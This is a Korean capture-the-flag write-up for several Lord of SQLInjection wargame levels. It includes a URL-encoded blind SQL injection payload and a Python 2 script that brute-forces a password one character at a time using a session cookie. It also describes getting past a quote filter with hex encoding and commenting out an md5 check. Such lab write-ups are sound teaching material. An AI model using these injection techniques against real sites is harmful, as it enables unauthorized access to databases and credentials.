SSo

pw 길이 찾기 : 123%27%20or%20ascii(id)-103%20and%20if(length(pw)=8,1,1=2)%23

플래그는 8자리이며 blind sqlinjection으로 풀었다.

import urllib, urllib2

url = "http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw="
result = ""
for i in range(1, 16):
        for j in range(33,127):
                payload = "123%27%20or%20ascii(id)-103%20and%20if(ascii(substr(pw,{},1))={},1,1=2)%23".format(i, j)
                testurl = url + payload
                print testurl
                req = urllib2.Request(testurl)
                req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11')
                req.add_header('Cookie','__cfduid=d4cc8c809fb82627de6749e5eaac73e1f1500957474; PHPSESSID=498v4fb9opfr78vauqu83eq635')
                res = urllib2.urlopen(req).read()
                if "Hello admin" in res:
                        print "[*]Find!"
                        result += chr(j)
                        break
print "[+]FIND FLAG! : {}".format(result)

이 문제는 no 파라미터에만 문자를 넣을 수 있다.

preg_match를 보면 no에 대해서 싱글쿼터와 더블쿼더가 필터로 추가되었다.

따라서 쿼터는 사용이 불가능하다.

no에 1을 넣고 리퀘스트를 보내면 Hello guest라는 리스폰스가 온다.

따라서 no=2 or id='admin'을 보내면 참이 되어 문제가 풀릴것이다.

하지만 쿼터가 막혀있으므로 id=admin을 다른방식으로 보내야한다.

mysql에선 문자를 hex로 변환해 보내도 hex를 디코딩한 문자열로 인식해서 값을 보여준다.

따라서 admin을 hex로 인코딩하여 보내면 문제가 풀리다.

첫번째 문제와 다른점은 pw부분에 값을 넣으면 md5로 인젝션을 해준다.

먼저 생각해볼 수 있는것은 md5부분을 무시하는것이다. 첫번째 문제처럼 id부분에서 주석을 넣으면 풀릴것이다.